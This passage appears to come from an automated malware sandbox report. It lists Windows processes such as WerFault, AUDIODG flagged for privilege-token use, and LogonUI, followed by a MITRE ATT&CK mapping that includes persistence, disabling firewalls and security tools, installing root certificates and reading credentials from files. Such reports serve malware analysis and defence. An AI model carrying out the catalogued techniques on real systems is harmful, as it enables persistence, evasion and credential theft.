C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 404 -ip 404
1⤵
PID:4572

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a0 0x4a4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5032 -ip 5032
1⤵
PID:1740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5508 -ip 5508
1⤵
PID:6008

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa390d855 /state1:0x41c64e6d
1⤵
PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery